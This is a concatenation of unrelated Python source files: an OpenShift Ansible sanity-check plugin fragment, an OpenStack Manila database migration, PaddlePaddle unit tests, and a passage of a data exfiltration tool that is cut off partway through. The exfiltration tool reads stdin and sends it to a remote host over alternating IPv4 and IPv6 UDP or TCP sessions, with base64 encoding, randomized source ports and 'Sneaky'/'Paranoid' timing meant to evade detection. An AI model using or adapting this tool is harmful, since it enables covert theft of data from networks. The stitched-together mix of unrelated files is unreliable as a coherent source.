old_keys = ('file', 'fileName', 'file_name', 'filename')
if not isinstance(idps, list):
raise errors.AnsibleModuleError("| not a list")
for idp in idps:
if idp['kind'] == 'HTPasswdPasswordIdentityProvider':
for old_key in old_keys:
if old_key in idp is not None:
raise errors.AnsibleModuleError(
'openshift_master_identity_providers contains a '
'provider of kind==HTPasswdPasswordIdentityProvider '
'and {} is set. Please migrate your htpasswd '
'files to /etc/origin/master/htpasswd and update your '
'existing master configs, and remove the {} key'
'before proceeding.'.format(old_key, old_key))
def validate_json_format_vars(self, hostvars, host):
"""Fails if invalid json format are found"""
found_invalid_json = []
for var in JSON_FORMAT_VARIABLES:
if var in hostvars[host]:
json_var = self.template_var(hostvars, host, var)
try:
json.loads(json_var)
except ValueError:
found_invalid_json.append([var, json_var])
except BaseException:
pass
if found_invalid_json:
msg = "Found invalid json format variables:\n"
for item in found_invalid_json:
msg += " {} specified in {} is invalid json format\n".format(item[1], item[0])
raise errors.AnsibleModuleError(msg)
return None
def check_for_oreg_password(self, hostvars, host, odt):
"""Ensure oreg_password is defined when using registry.redhat.io"""
reg_to_check = 'registry.redhat.io'
err_msg = ("oreg_auth_user and oreg_auth_password must be provided when"
"deploying openshift-enterprise")
err_msg2 = ("oreg_auth_user and oreg_auth_password must be provided when using"
"{}".format(reg_to_check))
oreg_password = self.template_var(hostvars, host, 'oreg_auth_password')
if oreg_password is not None:
# A password is defined, so we're good to go.
return None
oreg_url = self.template_var(hostvars, host, 'oreg_url')
if oreg_url is not None:
if reg_to_check in oreg_url:
raise errors.AnsibleModuleError(err_msg2)
elif odt == 'openshift-enterprise':
# We're not using an oreg_url, we're using default enterprise
# registry. We require oreg_auth_user and oreg_auth_password
raise errors.AnsibleModuleError(err_msg)
def run_checks(self, hostvars, host):
"""Execute the hostvars validations against host"""
distro = self.template_var(hostvars, host, 'ansible_distribution')
odt = self.check_openshift_deployment_type(hostvars, host)
self.check_whitelisted_registries(hostvars, host)
self.check_python_version(hostvars, host, distro)
self.check_image_tag_format(hostvars, host, odt)
self.check_pkg_version_format(hostvars, host)
self.check_release_format(hostvars, host)
self.network_plugin_check(hostvars, host)
self.check_hostname_vars(hostvars, host)
self.check_session_auth_secrets(hostvars, host)
self.check_unsupported_nfs_configs(hostvars, host)
self.check_htpasswd_provider(hostvars, host)
check_for_removed_vars(hostvars, host)
self.validate_json_format_vars(hostvars, host)
self.check_for_oreg_password(hostvars, host, odt)
def run(self, tmp=None, task_vars=None):
result = super(ActionModule, self).run(tmp, task_vars)
# self.task_vars holds all in-scope variables.
# Ignore settting self.task_vars outside of init.
# pylint: disable=W0201
self.task_vars = task_vars or {}
# pylint: disable=W0201
self.last_checked_host = "none"
# pylint: disable=W0201
self.last_checked_var = "none"
# self._task.args holds task parameters.
# check_hosts is a parameter to this plugin, and should provide
# a list of hosts.
check_hosts = self._task.args.get('check_hosts')
if not check_hosts:
msg = "check_hosts is required"
raise errors.AnsibleModuleError(msg)
# We need to access each host's variables
hostvars = self.task_vars.get('hostvars')
if not hostvars:
msg = hostvars
raise errors.AnsibleModuleError(msg)
# We loop through each host in the provided list check_hosts
for host in check_hosts:
try:
self.run_checks(hostvars, host)
except Exception as uncaught_e:
msg = "last_checked_host: {}, last_checked_var: {};"
msg = msg.format(self.last_checked_host, self.last_checked_var)
msg += str(uncaught_e)
raise errors.AnsibleModuleError(msg)
result["changed"] = False
result["failed"] = False
result["msg"] = "Sanity Checks passed"
return result
def is_registry_match(item, pattern):
"""returns True if the registry matches the given whitelist pattern
Unlike in OpenShift, the comparison is done solely on hostname part
(excluding the port part) since the latter is much more difficult due to
vague definition of port defaulting based on insecure flag. Moreover, most
of the registries will be listed without the port and insecure flag.
"""
item = "schema://" + item.split('://', 1)[-1]
return is_match(urlparse(item).hostname, pattern.rsplit(':', 1)[0])
# taken from https://leetcode.com/problems/wildcard-matching/discuss/17845/python-dp-solution
# (the same source as for openshift/origin/pkg/util/strings/wildcard.go)
def is_match(item, pattern):
"""implements DP algorithm for string matching"""
length = len(item)
if len(pattern) - pattern.count('*') > length:
return False
matches = [True] + [False] * length
for i in pattern:
if i != '*':
for index in reversed(range(length)):
matches[index + 1] = matches[index] and (i == item[index] or i == '?')
else:
for index in range(1, length + 1):
matches[index] = matches[index - 1] or matches[index]
matches[0] = matches[0] and i == '*'
return matches[-1]
|
|
# Copyright 2019 NetApp, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""add_share_network_subnets_table_and_modify_share_networks_and_servers
Revision ID: 805685098bd2
Revises: 6a3fd2984bc31
Create Date: 2019-05-09 16:28:41.919714
"""
# revision identifiers, used by Alembic.
revision = '805685098bd2'
down_revision = '6a3fd2984bc31'
from alembic import op
from manila.db.migrations import utils
from oslo_log import log
from oslo_utils import uuidutils
import sqlalchemy as sa
LOG = log.getLogger(__name__)
def upgrade():
# New table
try:
share_networks_fk_name = (
"fk_share_network_subnets_share_network_id_share_networks")
availability_zones_fk_name = (
"fk_share_network_subnets_availaility_zone_id_availability_zones")
share_network_subnets_table = op.create_table(
'share_network_subnets',
sa.Column('id', sa.String(36), primary_key=True, nullable=False),
sa.Column('neutron_net_id', sa.String(36), nullable=True),
sa.Column('neutron_subnet_id', sa.String(36), nullable=True),
sa.Column('network_type', sa.String(32), nullable=True),
sa.Column('cidr', sa.String(64), nullable=True),
sa.Column('segmentation_id', sa.Integer, nullable=True),
sa.Column('gateway', sa.String(64), nullable=True),
sa.Column('mtu', sa.Integer, nullable=True),
sa.Column('share_network_id', sa.String(36), sa.ForeignKey(
'share_networks.id', name=share_networks_fk_name)),
sa.Column('ip_version', sa.Integer, nullable=True),
sa.Column('availability_zone_id', sa.String(36),
sa.ForeignKey('availability_zones.id',
name=availability_zones_fk_name)),
sa.Column('created_at', sa.DateTime),
sa.Column('updated_at', sa.DateTime),
sa.Column('deleted_at', sa.DateTime),
sa.Column('deleted', sa.String(36), default='False'),
mysql_engine='InnoDB',
mysql_charset='utf8'
)
except Exception:
LOG.error("Table |%s| not created!", 'share_network_subnets')
raise
share_serves_fk_name = (
"fk_share_servers_share_network_subnet_id_share_network_subnets")
op.add_column(
'share_servers',
sa.Column(
'share_network_subnet_id', sa.String(36),
sa.ForeignKey('share_network_subnets.id',
name=share_serves_fk_name),
)
)
connection = op.get_bind()
share_networks_table = utils.load_table('share_networks', connection)
share_servers_table = utils.load_table('share_servers', connection)
share_network_subnets = []
# Get all share_networks and move all their data to share network subnet
for share_network in connection.execute(share_networks_table.select()):
share_network_subnet = {
'id': uuidutils.generate_uuid(),
'neutron_net_id': share_network.neutron_net_id,
'neutron_subnet_id': share_network.neutron_subnet_id,
'network_type': share_network.network_type,
'cidr': share_network.cidr,
'segmentation_id': share_network.segmentation_id,
'gateway': share_network.gateway,
'mtu': share_network.mtu,
'share_network_id': share_network.id,
'ip_version': share_network.ip_version,
'created_at': share_network.created_at,
'updated_at': share_network.updated_at,
'deleted_at': share_network.deleted_at,
'deleted': share_network.deleted,
}
share_network_subnets.append(share_network_subnet)
# Insertions for the new share network subnets
op.bulk_insert(share_network_subnets_table, share_network_subnets)
# Updates the field share server table with the share network subnet id
for sns in share_network_subnets:
share_servers = connection.execute(share_servers_table.select().where(
share_servers_table.c.share_network_id == sns['share_network_id']
))
updated_data = {'share_network_subnet_id': sns['id']}
_update_share_servers(share_servers, updated_data, share_servers_table)
if connection.engine.name == 'mysql':
# Drops necessary constraint from share servers table. Only mysql
# needs constraint handling. Postgresql/sqlite don't
op.drop_constraint("share_servers_ibfk_1", "share_servers",
type_="foreignkey")
op.drop_column('share_servers', 'share_network_id')
op.drop_column('share_networks', 'neutron_net_id')
op.drop_column('share_networks', 'neutron_subnet_id')
op.drop_column('share_networks', 'network_type')
op.drop_column('share_networks', 'segmentation_id')
op.drop_column('share_networks', 'gateway')
op.drop_column('share_networks', 'mtu')
op.drop_column('share_networks', 'cidr')
op.drop_column('share_networks', 'ip_version')
def _update_share_servers(share_servers, updated_data, share_servers_table):
for share_server in share_servers:
# pylint: disable=no-value-for-parameter
op.execute(
share_servers_table.update().where(
share_servers_table.c.id == share_server.id,
).values(updated_data)
)
def retrieve_default_subnet(subnets):
# NOTE (silvacarlose): A default subnet is that one which doesn't contain
# an availability zone. If all the share networks contain an az, we can
# retrieve whichever share network, then we pick up the first.
for subnet in subnets:
if subnet.availability_zone_id is None:
return subnet
return subnets[0] if subnets is not None else None
def downgrade():
connection = op.get_bind()
# Include again the removed fields in the share network table
op.add_column('share_networks',
sa.Column('neutron_net_id', sa.String(36), nullable=True))
op.add_column('share_networks',
sa.Column('neutron_subnet_id', sa.String(36), nullable=True))
op.add_column('share_networks',
sa.Column('network_type', sa.String(32), nullable=True))
op.add_column('share_networks',
sa.Column('cidr', sa.String(64), nullable=True))
op.add_column('share_networks',
sa.Column('gateway', sa.String(64), nullable=True))
op.add_column('share_networks',
sa.Column('mtu', sa.Integer, nullable=True))
op.add_column('share_networks',
sa.Column('segmentation_id', sa.Integer, nullable=True))
op.add_column('share_networks',
sa.Column('ip_version', sa.Integer, nullable=True))
# Include again the removed field in the share server table
op.add_column('share_servers',
sa.Column('share_network_id', sa.String(36),
sa.ForeignKey('share_networks.id',
name="share_servers_ibfk_1")))
share_networks_table = utils.load_table('share_networks', connection)
share_servers_table = utils.load_table('share_servers', connection)
subnets_table = utils.load_table('share_network_subnets', connection)
for share_network in connection.execute(share_networks_table.select()):
network_subnets = connection.execute(subnets_table.select().where(
subnets_table.c.share_network_id == share_network.id))
default_subnet = retrieve_default_subnet(network_subnets)
if default_subnet is not None:
op.execute(
# pylint: disable=no-value-for-parameter
share_networks_table.update().where(
share_networks_table.c.id == share_network.id,
).values({
'neutron_net_id': default_subnet.neutron_net_id,
'neutron_subnet_id': default_subnet.neutron_subnet_id,
'network_type': default_subnet.network_type,
'cidr': default_subnet.cidr,
'gateway': default_subnet.gateway,
'mtu': default_subnet.mtu,
'segmentation_id': default_subnet.segmentation_id,
'ip_version': default_subnet.ip_version,
})
)
for network_subnet in network_subnets:
share_servers = connection.execute(
share_servers_table.select().where(
share_servers_table.c.share_network_subnet_id ==
network_subnet.id))
updated_data = {'share_network_id': share_network.id}
_update_share_servers(share_servers, updated_data,
share_servers_table)
share_serves_fk_name = (
"fk_share_servers_share_network_subnet_id_share_network_subnets")
if connection.engine.name == 'mysql':
op.drop_constraint(share_serves_fk_name, "share_servers",
type_="foreignkey")
op.drop_column('share_servers', 'share_network_subnet_id')
try:
op.drop_table('share_network_subnets')
except Exception:
LOG.error("Failed to drop 'share_network_subnets' table!")
raise
|
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import paddle
import unittest
from paddle.jit.dy2static.convert_operators import eval_if_exist_else_none
class CallNotExist(paddle.nn.Layer):
def __call__(self):
# call a non-exist API to trigger exception
return paddle.nn.not_exist_api
class ForwardNotExist(paddle.nn.Layer):
def forward(self):
return 0
net = ForwardNotExist()
setattr(net, "forward", "A string so that convert forward will fail")
class TestConvertCall(unittest.TestCase):
def test_class_exception(self):
@paddle.jit.to_static
def call_not_exist():
net = CallNotExist()
return net()
with self.assertRaises(AttributeError):
call_not_exist()
@paddle.jit.to_static
def forward_not_exist():
return net()
with self.assertRaises(TypeError):
forward_not_exist()
class TestConvertShapeCompare(unittest.TestCase):
def test_non_variable(self):
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(1, "<", 2), True)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(1, "<", 2, "<=", 3),
True)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(1, ">", 2, "<=", 3),
False)
def error_func():
"""
Function used to test that comparison doesn't run after first False
"""
raise ValueError("Used for test")
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(
1, ">", 2, "<=", lambda: error_func()), False)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(1, "<", 2, "in",
[1, 2, 3]), True)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(1, "<", 2, "not in",
[1, 2, 3]), False)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(1, "<", 2, "is", 3),
False)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(1, "<", 2, "is not",
[1, 2, 3]), True)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare([1, 2], "==", [1, 2],
"!=", [1, 2, 3]), True)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare([1, 2], "!=", [1, 2, 3],
"==", [1, 2]), False)
def test_variable(self):
paddle.enable_static()
with paddle.static.program_guard(paddle.static.Program(),
paddle.static.Program()):
x = paddle.static.data(name='x', shape=[3, 2], dtype='float32')
y = paddle.static.data(name='y', shape=[3, 2], dtype='float32')
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(x, "is", x, "is not",
y), True)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(x, "is not", x,
"is not", y), False)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(x, "is", x, "is", y),
False)
eq_out = paddle.jit.dy2static.convert_shape_compare(x, "==", y)
not_eq_out = paddle.jit.dy2static.convert_shape_compare(x, "!=", y)
long_eq_out = paddle.jit.dy2static.convert_shape_compare(x, "==", x,
"!=", y)
place = paddle.CUDAPlace(0) if paddle.is_compiled_with_cuda(
) else paddle.CPUPlace()
exe = paddle.static.Executor(place)
x_y_eq_out = exe.run(feed={
"x": np.ones([3, 2]).astype(np.float32),
"y": np.ones([3, 2]).astype(np.float32)
},
fetch_list=[eq_out, not_eq_out, long_eq_out])
np.testing.assert_array_equal(
np.array(x_y_eq_out), np.array([[True], [False], [False]]))
set_a_zero = np.ones([3, 2]).astype(np.float32)
set_a_zero[0][0] = 0.0
x_y_not_eq_out = exe.run(
feed={
"x": np.ones([3, 2]).astype(np.float32),
"y": set_a_zero
},
fetch_list=[eq_out, not_eq_out, long_eq_out])
np.testing.assert_array_equal(
np.array(x_y_not_eq_out), np.array([[False], [True], [True]]))
paddle.disable_static()
class TestChooseShapeAttrOrApi(unittest.TestCase):
def test_api_shape_is_none(self):
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api([1, 2], None),
[1, 2])
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api([1], None), [1])
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api([2, 3, 7], None, 0),
2)
def test_attr_shape_is_int(self):
x = paddle.zeros([1, 3, 5, 7])
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api(x.shape[0],
paddle.shape(x)[0]),
1)
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api(x.shape[1],
paddle.shape(x)[1]),
3)
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api(-1,
paddle.shape(x)[0]),
paddle.shape(x)[0])
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api(-1,
paddle.shape(x), 0),
paddle.shape(x)[0])
def test_positive_attr_shape(self):
x = paddle.zeros([1, 3, 5, 7])
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api(x.shape,
paddle.shape(x)),
x.shape)
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api(x.shape,
paddle.shape(x), 3),
x.shape[3])
def test_negative_attr_shape(self):
x = paddle.zeros([7])
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api([-1],
paddle.shape(x), 0),
paddle.shape(x)[0])
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api([-1],
paddle.shape(x)),
paddle.shape(x))
class TestEvaIfExistElseNone(unittest.TestCase):
def test_globals(self):
global x_shape
x_shape = [1, 2, 3]
self.assertEqual(eval_if_exist_else_none('x_shape', locals()), None)
self.assertEqual(eval_if_exist_else_none('x_shape', globals()), x_shape)
del x_shape
def test_enclosing_scope(self):
global x_shape
x_shape = [1, 2, 3]
def foo():
y_shape = [2, 3, 4]
self.assertEqual(
eval_if_exist_else_none('x_shape', globals()), [1, 2, 3])
self.assertEqual(
eval_if_exist_else_none('y_shape', locals()), [2, 3, 4])
foo()
del x_shape
def test_global_in_func(self):
x_shape = [1, 2, 3]
def foo():
global y_shape
y_shape = [2, 3, 4]
self.assertEqual(
eval_if_exist_else_none('y_shape', globals()), [2, 3, 4])
self.assertEqual(eval_if_exist_else_none('x_shape', locals()), None)
self.assertEqual(
eval_if_exist_else_none('x_shape', globals()), None)
del y_shape
foo()
def test_none(self):
def foo():
x_shape = [2, 3, 4]
return x_shape
self.assertEqual(eval_if_exist_else_none('x_shape', locals()), None)
class ShapeLayer(paddle.nn.Layer):
def __init__(self):
super(ShapeLayer, self).__init__()
@paddle.jit.to_static(input_spec=[paddle.static.InputSpec(shape=[None, 1])])
def forward(self, x):
x = paddle.reshape(x, [-1, x.shape[1]])
bs = x.shape[0] # -1
# for trigger choos_shape_attr_or_api
out = paddle.zeros([bs, 1], dtype='float32')
return out
class TestChooseShapeAttrOrApiWithLayer(unittest.TestCase):
def test_tensor_shape(self):
x = paddle.zeros(shape=[4, 1], dtype='float32')
net = ShapeLayer()
out = net(x)
self.assertTrue(np.array_equal(out.numpy(), x.numpy()))
class TestIfElseNoValue(unittest.TestCase):
def test_else_ret_none(self):
input_x = paddle.to_tensor([[1, 2, 3], [4, 5, 6]])
@paddle.jit.to_static
def with_common_value(x, use_cache=False):
if use_cache:
y = x + 1
z = x + 2
return y, z
else:
c = x + 1
z = x - 1
return None
@paddle.jit.to_static
def without_common_value(x, use_cache=False):
if use_cache:
y = x + 1
z = x + 2
return y, z
else:
c = x + 1
return None
out = with_common_value(input_x, False)
self.assertIsNone(out)
out = without_common_value(input_x, False)
self.assertIsNone(out)
def test_else_ret_c(self):
input_x = paddle.to_tensor([[1, 2, 3], [4, 5, 6]])
@paddle.jit.to_static
def with_common_value(x, use_cache=False):
if use_cache:
y = x + 1
z = x + 2
return y, z
else:
c = x + 1
z = x - 1
return c
@paddle.jit.to_static
def without_common_value(x, use_cache=False):
if use_cache:
y = x + 1
z = x + 2
return y, z
else:
c = x + 1
return c
out = with_common_value(input_x, False)
self.assertListEqual(paddle.tolist(out), paddle.tolist(input_x + 1))
out = without_common_value(input_x, False)
self.assertListEqual(paddle.tolist(out), paddle.tolist(input_x + 1))
y, z = with_common_value(input_x, True)
self.assertListEqual(paddle.tolist(y), paddle.tolist(input_x + 1))
self.assertListEqual(paddle.tolist(z), paddle.tolist(input_x + 2))
def test_else_ret_cz(self):
input_x = paddle.to_tensor([[1, 2, 3], [4, 5, 6]])
@paddle.jit.to_static
def with_common_value(x, use_cache=False):
if use_cache:
y = x + 1
z = x + 2
return y, z, 1
else:
c = x + 1
z = x - 1
return c, z
@paddle.jit.to_static
def without_common_value(x, use_cache=False):
if use_cache:
y = x + 1
z = x + 2
return y, z, 1
else:
c = x + 1
d = x - 1
return c, d
c, z = with_common_value(input_x, False)
self.assertListEqual(paddle.tolist(c), paddle.tolist(input_x + 1))
self.assertListEqual(paddle.tolist(z), paddle.tolist(input_x - 1))
c, d = without_common_value(input_x, False)
self.assertListEqual(paddle.tolist(c), paddle.tolist(input_x + 1))
self.assertListEqual(paddle.tolist(d), paddle.tolist(input_x - 1))
if __name__ == '__main__':
unittest.main()
|
|
#!/usr/bin/python3 -tt
# -*- coding: utf-8 -*-
#
# (C) 2016 Bernhards 'Lockout' Blumbergs
# See LICENSE file for usage conditions
#
# Known issues:
# 1. TCP socket reuse problems once the socket has been closed
# 2. UDP socket spoofing, port reuse problems
# 3. Keepalive does not print out the previous buffer befoe new one is received
# 4. When sending UDP datagrams as fast as possible they do not arrive at the
# destination (of course). If file is being reassembled, EOF is not received
# 5. Performance degradation when hashing is used (of course)
#
# To be implemented:
# 1. Payload XOR encryption with a shared key
# 2. SSL signing and handshake for SSH, HTTPS traffic spoofing
# 3. Custom SSL certificate provision
# 4. Logging instead of printing verbose messages on the screen
# 5. Multiple IPv6 destination addresses as list for random selection
__version__ = "0.72.1/Devon"
import socket
import sys
import argparse
import base64
import random
import signal
from os import urandom
from time import sleep, time
from math import ceil
from hashlib import md5
def signal_handler(signal, frame):
sys.exit(0)
def hashsum(data):
"""
Calculates the exfiltrated data MD5 hash sum
"""
global hash_sum
if data:
data_hash = int(md5(data).hexdigest(), 16)
hash_sum += data_hash
def send64(data, mode):
"""
Send the specified data to the destination socket
over IPv6 and IPv4 interchangeably
"""
global data_sent
version = ip_version(args.ip_version_select)
if version == 4:
host = args.host4
if version == 6:
host = args.host6
if not args.udp and not args.tcp:
if args.verbose >= 2:
print("[+] Defaulting to UDP protocol")
args.udp = True
if args.udp:
if version == 4:
sock = socket.socket(
socket.AF_INET, # IPv4
socket.SOCK_DGRAM) # UDP socket
if version == 6:
sock = socket.socket(
socket.AF_INET6, # IPv6
socket.SOCK_DGRAM) # UDP socket
socket.SO_BINDTODEVICE = 25 # If not specified by the system
sock.setsockopt(
socket.SOL_SOCKET,
socket.SO_BINDTODEVICE,
args.interface.encode())
SourcePort = None
IPaddress = None
if args.source_port: # Set UDP source IP:port
SourcePort = args.source_port
if args.randomize_source_port:
SourcePort = random.randint(1024, 65535)
if args.source_ip4 and version == 4:
IPaddress = args.source_ip4
if args.source_ip6 and version == 6:
IPaddress = args.source_ip6
if SourcePort and not IPaddress: # TODO: Binding problems!
sock.bind(('', SourcePort)) # Currently works only
if IPaddress and not SourcePort: # for ports and not IPs
sock.bind((IPaddress))
if IPaddress and SourcePort:
sock.bind((IPaddress, SourcePort))
if args.verbose >= 1:
print(
"[*] IPv{0} UDP socket to"
" {1}:{2} via {3}".format(
version, host, port, args.interface)
)
if args.hashing: # Calculate hash before b64
hashsum(data)
if args.verbose >= 2:
print(
"[+] Exfiltrated data block hash sum: {0}".format(
hex(hash_sum))
)
if args.base64:
data = base64.b64encode(data)
if args.verbose >= 3:
print(
"[D] Base64 decoded data {0} bytes:\n{1}".format(
len(base64.b64decode(data)), base64.b64decode(data))
)
sock.sendto(data, (host, port)) # Send UDP datagram
data_sent += len(data)
if args.verbose >= 3:
print(
"[D] Buffer {0} bytes sent:\n{1}".format(
len(data), data)
)
sock.close()
return(True) # Send success
if args.tcp:
if version == 4:
sock = socket.socket(
socket.AF_INET, # IPv4
socket.SOCK_STREAM) # TCP socket
if version == 6:
sock = socket.socket(
socket.AF_INET6, # IPv6
socket.SOCK_STREAM) # TCP socket
socket.SO_BINDTODEVICE = 25 # If not specified by the system
sock.setsockopt(
socket.SOL_SOCKET,
socket.SO_BINDTODEVICE,
args.interface.encode())
try:
if args.source_port: # Set TCP source port
sock.bind(('', args.source_port)) # TODO: Set source IPv4/6
except OSError as error: # TODO: TCP socket reuse
if args.verbose >= 3:
print("[!] {0}".format(error))
sock.setsockopt(
socket.SOL_SOCKET,
socket.SO_REUSEADDR,
1)
# sock.bind(('', args.source_port))
if args.verbose >= 1:
print(
"[*] IPv{0} Connecting to TCP"
" socket {1}:{2} via {3}".format(
version, host, port, args.interface)
)
sock.connect((host, port))
if args.verbose >= 1:
print("[*] TCP socket connected")
if args.hashing: # Calculate hash before b64
hashsum(data)
if args.verbose >= 2:
print(
"[+] Exfiltrated data block hash sum: {0}".format(
hex(hash_sum))
)
if args.base64:
data = base64.b64encode(data)
if args.verbose >= 3:
print(
"[D] Base64 decoded data {0} bytes:\n{1}".format(
len(base64.b64decode(data)), base64.b64decode(data))
)
sock.send(data) # Send TCP stream
data_sent += len(data)
if args.verbose >= 3:
print(
"[D] Buffer {0} bytes sent:\n{1}".format(
len(data), data)
)
sock.close()
return(True) # Send success
def ip_version(sel_type):
"""
IP version selection algorithms
"""
random.seed(a=urandom(100)) # Initialize seed urandom
ipv4_only = False
ipv6_only = False
if sel_type == 0: # Random odd selection
r = random.randint(1, 100)
if r % 2 == 0:
version = 6
else:
version = 4
elif sel_type == 1: # Random selection
version = random.sample([4, 6], 1)[0]
elif sel_type == 2:
version = random.choice([4, 6])
elif sel_type == 3:
if random.random() >= 0.5:
version = 6
else:
version = 4
elif sel_type == 4: # IPv4 only
version = 4
ipv4_only = True
elif sel_type == 6: # IPv6 only
version = 6
ipv6_only = True
global ip6_sessions_total # Session tracking
global ip4_sessions_total
global ip6_sessions
global ip4_sessions
if version == 6:
ip6_sessions += 1
ip6_sessions_total += 1
if version == 4:
ip4_sessions += 1
ip4_sessions_total += 1
if ip6_sessions > args.max_subsequent_sessions and not ipv6_only:
version = 4
ip6_sessions = 0
ip4_sessions = 1
ip6_sessions_total -= 1
ip4_sessions_total += 1
if args.verbose >= 2:
print(
"[+] Maximum number of subsequent {0}"
" IPv6 sessios reached".format(
args.max_subsequent_sessions)
)
if ip4_sessions > args.max_subsequent_sessions and not ipv4_only:
version = 6
ip4_sessions = 0
ip6_sessions = 1
ip4_sessions_total -= 1
ip6_sessions_total += 1
if args.verbose >= 2:
print(
"[+] Maximum number of subsequent {0}"
" IPv4 sessios reached".format(
args.max_subsequent_sessions)
)
return(version)
def wait():
"""
Session timing (seconds)
"""
if args.timing_set == -1:
if args.timing == 0:
sleep_time = 0.15 # Insane
if args.verbose >= 2:
print("[+] Insane send at {0}s".format(sleep_time))
elif args.timing == 1:
sleep_time = 3 # Agressive
if args.verbose >= 2:
print("[+] Agressive send at {0}s".format(sleep_time))
elif args.timing == 2:
sleep_time = 15 # Polite
if args.verbose >= 2:
print("[+] Polite send at {0}s".format(sleep_time))
elif args.timing == 3:
sleep_time = 30 # Sneaky
if args.verbose >= 2:
print("[+] Sneaky send at {0}s".format(sleep_time))
elif args.timing >= 4:
sleep_time = 300 # Paranoid
if args.verbose >= 2:
print("[+] Paranoid send at {0}s".format(sleep_time))
if args.timing_set >= 0: # Custom timing
sleep_time = args.timing_set
if args.verbose >= 2:
print(
"[+] Custom interval timing of {0}s".format(
sleep_time)
)
if args.timing_randomize:
sleep_time = sleep_time + random.uniform(-0.4, 0.4) * sleep_time
if args.verbose >= 2:
print(
"[+] Session interval randomized to {0}s".format(
sleep_time)
)
sleep(sleep_time)
return(True)
# Command line option parser
parser = argparse.ArgumentParser(
description="Exfiltrate data over dual-stack IPv4 and IPv6 sessions",
)
parser.add_argument(
'-t', '--tcp',
action="store_true",
help="Use TCP")
parser.add_argument(
'-u', '--udp',
action="store_true",
help="Use UDP. Default: udp")
parser.add_argument(
'-l', '--listen',
action="store_true",
help="Listen (server) mode. Default: send (client)")
parser.add_argument(
'-b64', '--base64',
action="store_true",
help="Base64 encode/decode the payload")
parser.add_argument(
'-b', '--buffer',
type=int,
default=500,
help="Buffer size. Default: 500")
parser.add_argument(
'-h4', '--host4',
type=str,
default="127.0.0.1",
help="Host IPv4 address. Default: 127.0.0.1")
parser.add_argument(
'-h6', '--host6',
type=str,
default="::1",
help="Host IPv6 address. Default: ::1")
parser.add_argument(
'-p', '--port',
type=int,
default=443,
help="Destination or listen port. Default: 443")
parser.add_argument(
'-i', '--interface',
type=str,
default="eth0",
help="Network interface. Default: eth0")
parser.add_argument(
'-v', '--verbose',
action="count",
default=0,
help="Increase verbosity")
parser.add_argument(
'--show_stat',
action="store_true",
help="Show exfiltration statistics. On if verbosity used")
parser.add_argument(
'-T', '--timing',
type=int,
default=1,
help="Session delay timing level 0-4. Default: 1")
parser.add_argument( # TODO: Implement TCP
'-sp', '--source_port', # source port
type=int,
help="Specify source port. UDP only")
parser.add_argument(
'--randomize_source_port',
action="store_true",
help="Randomize source port. Default:1024-65535")
parser.add_argument(
'-sip4', '--source_ip4',
type=str,
help="Specify source IPv4. UDP only")
parser.add_argument(
'-sip6', '--source_ip6',
type=str,
help="Specify source IPv6. UDP only")
parser.add_argument(
'-k', '--keepalive',
action="store_true",
help="Keep the listener alive. Default: False")
parser.add_argument(
'--timing_randomize',
action="store_true",
help="Randomize session delay timing. Default: False")
parser.add_argument(
'--timing_set',
type=int,
default=-1,
help="Set custom timing. Default: Disabled")
parser.add_argument(
'--ip_version_select',
type=int,
default=0,
help="Choose random IP version selection approach")
parser.add_argument(
'--max_subsequent_sessions',
type=int,
default=3,
help="Maxmimum number of subsequent sessions of same IP version."
" Default: 3")
parser.add_argument(
'--hashing',
action="store_true",
help="calculate exfiltrated data hash sum. Default: False")
parser.add_argument(
'-V', '--version',
action="store_true",
help="Print program version and exit")
args = parser.parse_args()
if args.version:
print("Version: ", __version__)
sys.exit(0)
# Program variables
buffer_size = args.buffer
host4 = args.host4
host6 = args.host6
port = args.port
ip6_sessions = 0
ip4_sessions = 0
ip6_sessions_total = 0
ip4_sessions_total = 0
data_sent = 0
hash_sum = 0x0
# Main routine
# Client mode
if not args.listen:
if args.verbose >= 1:
print("[*] Client mode")
start_time = time()
buff = 0
read_data = b""
data = b""
while True:
read_data = sys.stdin.buffer.read(1)
if not read_data: # End of input or EOF
send64(data, 0)
break
data += read_data
buff += 1
if buff == buffer_size:
send64(data, 0)
wait()
buff = 0
data = b""
send64(b"", 0) # End of transmission
end_time = time() # Can be profiled?
if args.verbose >= 1 or args.show_stat:
print(
"[*] SUMMARY: IPv4 sessions: {0}, IPv6 sessions: {1}, "
